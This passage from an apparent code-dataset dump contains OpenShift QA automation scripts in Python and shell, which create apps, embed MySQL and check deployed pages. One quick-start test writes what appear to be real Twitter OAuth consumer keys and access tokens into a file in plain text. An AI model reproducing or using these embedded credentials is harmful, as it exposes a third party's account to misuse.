QuickStartLiferay(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"jbossas\"]\n self.config.application_embedded_cartridges = [ common.cartridge_types[\"mysql\"] ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: JBoss AS Liferay\"\n self.config.git_upstream_url = \"git://github.com/openshift/jbossas7-liferay-quickstart.git\"\n self.config.page = \"\" # means '/'\n self.config.page_pattern = \"OpenShift\"\n \n def 
initialize(self):\n self.log_info(\"Initializing\")\n # General set-up\n common.env_setup()\n\n size = \"medium\" \n # Changing node profile and VIP flag\n if self.get_run_mode() == \"DEV\":\n common.change_node_profile(\"medium\")\n common.add_gearsize_capability('medium')\n elif self.get_run_mode() == \"OnPremise\":\n size = \"small\"\n \n # Creating the application\n common.create_app(\n self.config.application_name,\n self.config.application_type,\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n clone_repo = True,\n git_repo = \"./\" + self.config.application_name,\n gear_size = size\n )\n \n # Embedding cartridges\n for cartridge in self.config.application_embedded_cartridges:\n common.embed(\n self.config.application_name,\n \"add-\" + cartridge,\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd\n )\n \n def post_deployment_steps(self):\n pass\n #sleep(120)\n \n def finalize(self):\n QuickStartTest.finalize(self)\n if self.get_run_mode() == \"DEV\":\n common.change_node_profile()\n common.remove_gearsize_capability('medium')\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartLiferay)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6090577840805054, "alphanum_fraction": 0.6304008364677429, "avg_line_length": 23.9350643157959, "blob_id": "a2a5b2ffbc87989a80650962f66a595c2871bcd9", "content_id": "c791111bed927dac206ce65924f02a0fed68f79e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1921, "license_type": "no_license", "max_line_length": 110, "num_lines": 77, "path": "/automation/open/testmodules/UI/web/case_180954.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_180954.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CreateSpringEapAppAndChangeDomainName(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n\n #create a springeap app\n #web.create_app(\"springeap6\",\"springeap\")\n web.go_to_create_app(\"springeap6\")\n web.input_by_id(\"application_name\", \"springeap\")\n web.click_element_by_id(\"application_submit\")\n time.sleep(20)\n \n \n web.go_to_domain_edit()\n web.input_by_id(\"domain_name\",\"yujzhangcccc\")\n web.click_element_by_id(\"domain_submit\")\n time.sleep(15)\n \n\n #check the url after changed the domain name\n web.go_to_app_detail(\"springeap\")\n web.assert_element_present_by_link_text(\"http://springeap-yujzhangcccc.\"+web.platform+\".rhcloud.com/\")\n #change the domain name back\n web.go_to_domain_edit()\n web.input_by_id(\"domain_name\",web.domain)\n web.click_element_by_id(\"domain_submit\")\n time.sleep(15)\n \n #delete a springeap app\n web.delete_last_app(\"springeap\")\n \n self.tearDown()\n\n return self.passed(\" case_180954--CreateSpringEapAppAndChangeDomainName passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateSpringEapAppAndChangeDomainName)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n 
suite()\n\n#\n# end of case_174336.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5917180180549622, "alphanum_fraction": 0.6023271679878235, "avg_line_length": 34.192771911621094, "blob_id": "1427d445f360dc9c59504152bf857c04a5d2fedc", "content_id": "26151771b1b0d1c8ed2228ab96cb8d3b0074e28a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2922, "license_type": "no_license", "max_line_length": 210, "num_lines": 83, "path": "/automation/open/testmodules/RT/cartridge/wsgi_framework_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[rhc-cartridge]wsgi/Python framework support\nhttps://tcms.engineering.redhat.com/case/122300/\n\"\"\"\nimport os,sys,re\n\nimport testcase,common,OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge]wsgi/Python framework support\"\n\n self.app_name = \"wsgiframework\"\n self.app_type = common.app_types[\"wsgi\"]\n self.git_repo = \"./%s\" % (self.app_name)\n tcms_testcase_id=122300\n common.env_setup()\n\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass WsgiFrameworkSupport(OpenShiftTest):\n def test_method(self):\n # 1.Create an app\n self.steps_list.append( testcase.TestCaseStep(\"1. Create an wsgi app: %s\" % (self.app_name),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 2.Make some change to the git repo and git push\n cmd = \"rm -rf %s/wsgi/application && cp %s/app_template/wsgi.template %s/wsgi/application && cd %s && git add . 
&& git commit -am t && git push\" % (self.git_repo, WORK_DIR, self.git_repo, self.git_repo)\n self.steps_list.append( testcase.TestCaseStep(\"2.Make some change to the git repo\",\n cmd,\n expect_description=\"Copy succeed\",\n expect_return=0))\n\n # 3.Check the app via browser\n test_html = \"WSGI test script is working\"\n self.steps_list.append( testcase.TestCaseStep(\"3.Check the app via browser\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), \n test_html, \n \"-H 'Pragma: no-cache'\", 5, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(WsgiFrameworkSupport)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6039381623268127, "alphanum_fraction": 0.6091724634170532, "avg_line_length": 32.43333435058594, "blob_id": "ddc9eca1e16e4e29366c95186b06e43bbd4713f4", "content_id": "60bdad5c070d4b88b452c63d6ff93c179573d894", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4012, "license_type": "no_license", "max_line_length": 158, "num_lines": 120, "path": "/automation/open/testmodules/RT/scaling/non_scalable_app_exposing_port.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n ITEST = 'DEV'\n\n def initialize(self):\n self.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.domain_name = common.get_domain_name()\n self.test_variant=self.config.test_variant\n self.app_type = common.app_types[self.test_variant]\n self.app_name = 'my%s%s' % ( self.test_variant, common.getRandomString() )\n tcms_testcase_id = 138428\n self.rest_client = openshift.Openshift(host=self.config.instance_info['ip'],\n user=self.user_email,\n passwd=self.user_passwd)\n\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass NonScalableAppExposingPort(OpenShiftTest):\n def existing_exposed_ports(self):\n \n (gears, number_of_gears) = self.rest_client.get_gears(self.app_name, self.domain_name)\n\n exposed_ports = 0\n for component in gears[0]['components']:\n if component['proxy_port'] != None and component['proxy_host'] != None:\n exposed_ports += 1\n\n return exposed_ports\n\n def exposing_port(self, cartridge):\n return common.run_remote_cmd_as_root(\n \"/usr/libexec/openshift/cartridges/embedded/%s/info/hooks/expose-port %s %s %s\" %\n (\n cartridge,\n self.app_name,\n self.domain_name,\n OSConf.get_app_uuid(self.app_name)\n )\n )[0]\n\n def test_method(self):\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Creating an application\",\n common.create_app,\n 
function_parameters = [ self.app_name, self.app_type, self.user_email, self.user_passwd, False ],\n            expect_description = \"The application must be created successfully\",\n            expect_return = 0\n        ))\n\n        self.steps_list.append(testcase.TestCaseStep(\n            \"Embedding MySQL cartridge\",\n            common.embed,\n            function_parameters = [ self.app_name, \"add-\" + common.cartridge_types[\"mysql\"] ],\n            expect_description = \"MySQL cartridge must be embedded successfully\",\n            expect_return = 0\n        ))\n\n        self.steps_list.append(testcase.TestCaseStep(\n            \"Verifying the number of exposed ports\",\n            self.existing_exposed_ports,\n            expect_description = \"The number of exposed ports must be 0\",\n            expect_return = 0\n        ))\n\n        self.steps_list.append(testcase.TestCaseStep(\n            \"Expose port information\",\n            self.exposing_port,\n            function_parameters = [ common.cartridge_types['mysql'] ],\n            expect_description = \"The operation must be successful\",\n            expect_return = 0\n        ))\n\n        self.steps_list.append(testcase.TestCaseStep(\n            \"Verifying the number of exposed ports after the manual exposure\",\n            self.existing_exposed_ports,\n            expect_description = \"The number of exposed ports must be 1\",\n            expect_return = 1\n        ))\n\n        case = testcase.TestCase(\"[US1907][BusinessIntegration] Retrieve gear information by explicitly exposing port for a non-scalable app\", self.steps_list)\n        case.run()\n\n        if case.testcase_status == 'PASSED':\n            return self.passed(\"%s passed\" % self.__class__.__name__)\n        if case.testcase_status == 'FAILED':\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(NonScalableAppExposingPort)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.6520400047302246, "alphanum_fraction": 0.656658947467804, "avg_line_length": 23.05555534362793, "blob_id": "4469950f8bf7defda73feecf0017e99884c4081b", "content_id": "33335b4156972a2203831cbc5c6d859d7db28760", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1299, "license_type": "no_license", "max_line_length": 69, "num_lines": 54, "path": "/automation/open/lib/reports/Curses.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab\n# \n#\n\n\"\"\"\nReport object that connects to CLI CursesIO object.\n\n\"\"\"\n\nimport sys\n\nimport reports\nimport cursesio\n\n# Assumed default for the result methods below: the original referenced\n# NO_MESSAGE without defining or importing it.\nNO_MESSAGE = \"no message\"\n\nclass CursesReport(reports.NullReport):\n    def __init__(self, ui=None):\n        self._ui = ui or cursesio.get_curses_ui()\n\n    def write(self, text):\n        return self._ui.write(text)\n    def writeline(self, text=\"\"):\n        return self._ui.writeline(text)\n    def writelines(self, lines):\n        return self._ui.writelines(lines)\n\n    def initialize(self, *args): pass\n    def logfile(self, filename): pass\n    def finalize(self): pass\n    def add_title(self, title): pass\n    def add_heading(self, text, level=1): pass\n    def add_message(self, msgtype, msg, level=1):\n        self._ui.write(\"%s%s: %s\\n\" % (\"  \"*(level-1), msgtype, msg))\n    # XXX\n    def add_summary(self, text): pass\n    def add_text(self, text): pass\n    def add_url(self, text, url): pass\n    def passed(self, msg=NO_MESSAGE): pass\n    def failed(self, msg=NO_MESSAGE): pass\n    def incomplete(self, msg=NO_MESSAGE): pass\n    def abort(self, msg=NO_MESSAGE): pass\n    def info(self, msg): pass\n    def diagnostic(self, msg): pass\n    def newpage(self): pass\n    def newsection(self): pass\n\n\n\ndef _test(argv):\n    pass # XXX\n\nif __name__ == \"__main__\":\n    _test(sys.argv)\n" }, { "alpha_fraction": 0.5951020121574402, "alphanum_fraction": 0.5967347025871277, "avg_line_length": 41.34000015258789, "blob_id": "22ff6d919c5eb612834a1a9f52741636b0ea65e7", "content_id": "0ec6fd5f8382fce76dcefe683c0887531b9ced6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2067, "license_type": "no_license", "max_line_length": 254, "num_lines": 50, "path": "/automation/open/testmodules/RT/cartridge/app_template/mysql/applicationpython-2.7", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport MySQLdb\n\ndef mysql():\n    content='GEAR DNS: ' + os.environ['OPENSHIFT_GEAR_DNS'] + '\\n'\n    try:\n        con=MySQLdb.connect(host=os.environ['OPENSHIFT_MYSQL_DB_HOST'], user=os.environ['OPENSHIFT_MYSQL_DB_USERNAME'], passwd=os.environ['OPENSHIFT_MYSQL_DB_PASSWORD'], db=os.environ['OPENSHIFT_APP_NAME'],port=int(os.environ['OPENSHIFT_MYSQL_DB_PORT']))\n        cursor = con.cursor()\n        cursor.execute(\"DROP TABLE IF EXISTS ucctalk\")\n        cursor.execute(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\")\n        cursor.execute(\"INSERT INTO ucctalk (speaker,title) VALUES ('Jeremy Zawodny', 'Optimizing MySQL'), ('Sanja Byelkin', 'Sub-Queries in MySQL'), ('Tim Bunce', 'Advanced Perl DBI')\")\n        cursor.execute(\"SELECT * FROM ucctalk\")\n        alldata = cursor.fetchall()\n        if alldata:\n            for rec in alldata:\n                content+=rec[0]+\", \"+rec[1]+\"\\n\"\n        cursor.close()\n        con.commit ()\n        con.close()\n    except Exception, e:\n        content = str(e)\n    return content\n\ndef application(environ, start_response):\n    ctype = 'text/plain'\n    if environ['PATH_INFO'] == '/health':\n        response_body = \"1\" \n    elif environ['PATH_INFO'] == '/env':\n        response_body = ['%s: %s' % (key, value)\n                         for key, value in sorted(environ.items())]\n        response_body = '\\n'.join(response_body)\n    elif environ['PATH_INFO'] == '/mysql':\n        response_body = mysql()\n    else:\n        ctype = 'text/html'\n        response_body = '''<!doctype html>\n</html>'''\n\n    status = '200 OK'\n    response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n    #\n    start_response(status, response_headers)\n    return [response_body]\n\nif __name__ == '__main__':\n    from wsgiref.simple_server import make_server\n    httpd = make_server('localhost', 8051, application)\n    # Wait for a single request, serve it and quit.\n    httpd.handle_request()\n" }, { "alpha_fraction": 0.6515973210334778, "alphanum_fraction": 0.670283317565918, "avg_line_length": 28.60714340209961, "blob_id": "73c00d0cb08e29ad512cd94f8221ba55b9bda953", "content_id": "9d72969bf985c7feabc413608b677feb9e672bfa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1659, "license_type": "no_license", "max_line_length": 130, "num_lines": 56, "path": "/automation/open/testmodules/RT/cartridge/embed_mysql_to_raw.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US1221][rhc-cartridge] embed MySQL instance to DIY application\nhttps://tcms.engineering.redhat.com/case/122382/\n\"\"\"\nimport os\nimport sys\n\nimport rhtest\nimport testcase\nimport common\n\nclass OpenShiftTest(rhtest.Test):\n    def initialize(self):\n        self.summary = \"[US1221][rhc-cartridge] embed MySQL instance to DIY application\"\n        self.app_name = \"diy\"\n        self.app_type 
= common.app_types[\"diy\"]\n tcms_testcase_id=122382\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass EmbedMysqlToRaw(OpenShiftTest):\n def test_method(self):\n #\"Create a diy app\", \n ret = common.create_app(self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret,0, \"the app should be created successfully\")\n\n #\"Embed mysql to the app\", \n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mysql\"])\n self.assert_equal(ret, 0, \"the mysql cartridge should be embedded successfully\")\n\n #\"Remove embedded mysql from the app\", \n ret = common.embed(self.app_name, \"remove-\" + common.cartridge_types[\"mysql\"])\n self.assert_equal(ret,0, \"the mysql should be removed successfully\")\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EmbedMysqlToRaw)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.61078941822052, "alphanum_fraction": 0.6150563955307007, "avg_line_length": 29.952829360961914, "blob_id": "bff73c5572a1b6f7c1795d29015fb89331ddb099", "content_id": "ea80146cfcb11e7ab5515b4b646a1956fddc9e7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3281, "license_type": "no_license", "max_line_length": 141, "num_lines": 106, "path": "/automation/open/testmodules/RT/limits/outbound_mail_port.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.app_type = \"python\"\n self.app_name = 'my%s%s' % ( self.app_type, common.getRandomString() )\n self.git_repo = './' + self.app_name\n tcms_testcase_id=130873\n \n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass OutboundMailPort(OpenShiftTest):\n\n def app_config(self, git_repo, work_dir):\n configuration_steps = [\n \"cd %s\" % ( git_repo ),\n \"cp -fv %s/app_template/outbound_mail_port/application wsgi/application\" % ( work_dir ),\n \"git commit -a -m deployment\",\n \"git push\"\n ]\n\n ( ret_code, ret_output ) = common.command_getstatusoutput(\" && \".join(configuration_steps))\n print ret_output\n return ret_code\n\n def check_port_result(self, app_name, path, pattern):\n app_url = OSConf.get_app_url(app_name)\n return common.grep_web_page(\"http://%s/%s\" % ( app_url, path ) , pattern )\n\n def test_method(self):\n\n self.steps_list.append(testcase.TestCaseStep(\n 'Creating the application',\n common.create_app,\n function_parameters = [ self.app_name, common.app_types[self.app_type], self.user_email, self.user_passwd, True, self.git_repo ],\n expect_description = 'The app should be created successfully',\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n 'Configuring our Python application',\n self.app_config,\n function_parameters = 
[ self.git_repo, WORK_DIR ],\n expect_description = 'App configuration should be successful',\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n 'Checking outbound mail ports',\n self.check_port_result,\n function_parameters = [ self.app_name, 'scan', \" Connected\" ],\n expect_description = \"The application should access at least one of Google's mail ports\",\n expect_return = 0\n ))\n\n step=testcase.TestCaseStep(\n \"Destroy app: %s\" % (self.app_name),\n common.destroy_app,\n function_parameters = [self.app_name],\n expect_return = 0)\n self.steps_list.append(step)\n\n case = testcase.TestCase(\"[rhc-cartridge][US1742] Outbound mail port\", self.steps_list )\n case.run()\n\t\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(OutboundMailPort)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6421319842338562, "alphanum_fraction": 0.682741105556488, "avg_line_length": 29.30769157409668, "blob_id": "c46d1e9fb676fe9d867b0ddb73823d6bbcbe36a6", "content_id": "84da466bd31956e05239bdbb4e248ae78eb07999", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 394, "license_type": "no_license", "max_line_length": 64, "num_lines": 13, "path": "/automation/open/Longevity/cartridge/mysql_insert.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\nmysql -uroot<<EOF\nuse $1\ncreate table test(id int(8), name char(20));\ninsert into test values('0','openshifit');\ninsert into test values('1','nsun');\nselect * from test;\nEOF\n\n#drop table test\n#mysql -Druby0 \"create table test(id int(8), name char(20));\"\n#mysql -Druby0 -e \"create table test(id int(8), name char(20));\"\n#mysql -Druby0 -e \"insert into test values('0','openshifit');\"\n" }, { "alpha_fraction": 0.6075631976127625, "alphanum_fraction": 0.6112290024757385, "avg_line_length": 43.43965530395508, "blob_id": "2dd3448d6a3a53a7f6e86775c3f3a7f8954eee7e", "content_id": "fadc3ad0a8e59705d23ad1355721fde3a913c4c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5183, "license_type": "no_license", "max_line_length": 173, "num_lines": 116, "path": "/automation/open/testmodules/UI/web/testrun.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import unittest, time, re\nimport baseutils\nimport sys\nimport re\nfrom optparse import OptionParser \nimport commands\nimport subprocess\nimport random\nimport TCMS\nimport TCMSTestRunner\n\n'''\n1. get the list of scripts from TCMS\n2. run them one by one\n3. 
do update\n'''\n\ndef get_classname_from_testcase(script_file):\n f = open(script_file, \"r\")\n obj = re.search(r\"class\\s+([^\\(]+)\\(\", f.read())\n f.close()\n if obj:\n print obj.group(1)\n return obj.group(1)\n else:\n raise Exception(\"Unable to get classname from %s.\"%script_file)\n\n\ndef testrun_suite(testrun_id):\n '''\n Returns a array of\n '''\n suites = []\n try:\n openshift = TCMS.OpenShift(4962, 'demo', repo='./openshift_web')\n script_list = openshift.get_testrun_scripts(testrun_id)\n except Exception as e:\n raise e\n\n for s in script_list:\n tcms_suite=unittest.TestSuite()\n try:\n script_name = s['script']\n print \"DEBUG: script: %s\"%script_name\n #TODO:obj = re.search(r\"(.*)/([^/]+).py\",script_name)\n obj = re.search(r\"(.*).py\",script_name)\n module_name = obj.group(1)\n #print \"Importing %s\"%module_name\n exec \"import %s\"%module_name\n #print \"Done.\"\n classname = get_classname_from_testcase(script_name) \n #print \"tcms_suite=unittest.TestLoader().loadTestsFromTestCase(%s.%s)\"%(module_name, classname)\n #exec \"tcms_suite=unittest.TestLoader().loadTestsFromTestCase(%s.%s)\"%(module_name, classname)\n exec \"tcms_suite=unittest.TestLoader().loadTestsFromTestCase(%s.%s)\"%(module_name, classname)\n tcms_suite.case_run_id=s['case_run_id']\n#\n#hack the class: add title,script for the first object\n#\n #For all possible test cases... def test_X_...\n for i in range(len(tcms_suite._tests)):\n tcms_suite._tests[i].title = s['title']\n tcms_suite._tests[i].case_id = s['case_id']\n tcms_suite._tests[i].script = s['script']\n tcms_suite._tests[i].case_run_id= s['case_run_id']\n suites.append(tcms_suite)\n except Exception as e:\n raise Exception(e)\n\n return unittest.TestSuite(suites)\n\n\nif __name__ == \"__main__\":\n i=random.uniform(1,10)\n generate_new_user=\"libra-test+stage\"+str(i)[3:10]+\"@redhat.com\"\n baseutils.update_config_file('environment','new_user',generate_new_user)\n if len(sys.argv) < 2:\n print \"\"\"usage: --url=<url> --testrun_id=<testrun_id> --browser=<browser> --new_user=<new_user> --title=<title> --description=<decription> --proxy=<http://proxy>\"\"\"\n sys.exit(1)\n else:\n parser = OptionParser()\n parser.add_option(\"--url\", dest=\"url\",default=\"https://openshifttest.redhat.com\",\n help=\"url link\")\n parser.add_option(\"--browser\", dest=\"browser\",default=\"firefox\",\n help=\"browser name\")\n parser.add_option(\"--browserpath\", dest=\"browserpath\",default=0,\n help=\"browser path\")\n parser.add_option(\"--proxy\", dest=\"proxy\", default=\"\",\n help=\"Proxy URL\")\n parser.add_option(\"--new_user\", dest=\"new_user\",\n help=\"new user\")\n parser.add_option(\"--resultfile\", dest=\"resultfile\",default=\"OpenShift.WebTestResult.html\",\n help=\"result file name\")\n parser.add_option(\"--title\", dest=\"title\",default=\"OpenShift Web Test Report\",\n help=\"result file title\")\n parser.add_option(\"--description\", dest=\"description\",default=\"This is OpenShift Web Test Result\",\n help=\"result file description\")\n parser.add_option(\"--testrun_id\", dest=\"testrun_id\",default=False,\n help=\"testrun_id for web automated test cases\")\n (options, args) = parser.parse_args()\n if options.url != None: baseutils.update_config_file('environment','url', options.url)\n if options.browser != None:baseutils.update_config_file('environment','browser', options.browser)\n if options.browserpath != None:baseutils.update_config_file('environment','browserpath',options.browserpath)\n if options.proxy != None: 
baseutils.update_config_file('environment', 'proxy', options.proxy)\n if options.new_user != None:baseutils.update_config_file('environment','new_user',options.new_user)\n #if config.proxy:\n # baseutils.update_config_file('environment','libra_server',\"stg.rhcloud.com\")\n #else:\n # baseutils.update_config_file('environment','libra_server',\"dev.rhcloud.com\")\n if options.resultfile != None: baseutils.update_config_file('output','resultfile',options.resultfile)\n if options.title != None:baseutils.update_config_file('output','title',options.title)\n if options.description != None:baseutils.update_config_file('output','description',options.description)\n\n runner = TCMSTestRunner.TCMSTestRunner(testrun_id=options.testrun_id)\n#we should load it here...\n ret=runner.run(testrun_suite(options.testrun_id))\n sys.exit(ret)\n \n \n\n \n \n\n\n" }, { "alpha_fraction": 0.6536841988563538, "alphanum_fraction": 0.6557894945144653, "avg_line_length": 34.185184478759766, "blob_id": "dc309a3b39080a74d24ccedff3690cb70da12e63", "content_id": "c165bcaf551d97723784ef2ae40bd533a32f4186", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1900, "license_type": "no_license", "max_line_length": 111, "num_lines": 54, "path": "/automation/open/testmodules/RT/quick_start/quick_start_tweetstream.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport rhtest\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartTweetstream(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"jbossas\"]\n self.config.application_embedded_cartridges = [ ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: Tweetstream\"\n self.config.git_upstream_url = \"git://github.com/openshift/tweetstream-example.git\"\n self.config.page = \"/pages/home.jsf\"\n self.config.page_pattern = [ \"TweetStream\", \"Top Tags\", \"Top Tweeters\" ]\n \n def post_configuration_steps(self):\n self.log_info(\"Steps after configuration\")\n properties_file = self.config.application_name + \"/tweetstream/src/main/resources/twitter4j.properties\"\n self.info(\"Editing file: \" + properties_file)\n properties = open(properties_file, \"w\")\n properties.write(\"oauth.consumerKey=WYWyn60DsoDDkSmy3AGhw\\n\")\n properties.write(\"oauth.consumerSecret=uveHeAnasRBdJJevbl04P2nsqeZRxXM8HYqAyL2Vc\\n\")\n properties.write(\"oauth.accessToken=331629113-X53jKX8CcdgBxu1oqfx9dYBj8iEQ8wBuxjKiPok4\\n\")\n properties.write(\"oauth.accessTokenSecret=uTLdLwM5uoLepV4kyNUtPXUg0xc7MZKOeHBicBhw\\n\")\n properties.close()\n \n def pre_deployment_steps(self):\n self.log_info(\"Steps before deployments\")\n steps = [\n \"cd %s\" % self.config.application_name,\n \"git add .\",\n \"git commit -a -m configuration\"\n ]\n common.command_get_status(\" && \".join(steps))\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartTweetstream)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5881233215332031, "alphanum_fraction": 0.5961172580718994, "avg_line_length": 38.19403076171875, "blob_id": "c144bb8d41f0e1c4d893c87280ca7e08d7c1557d", "content_id": 
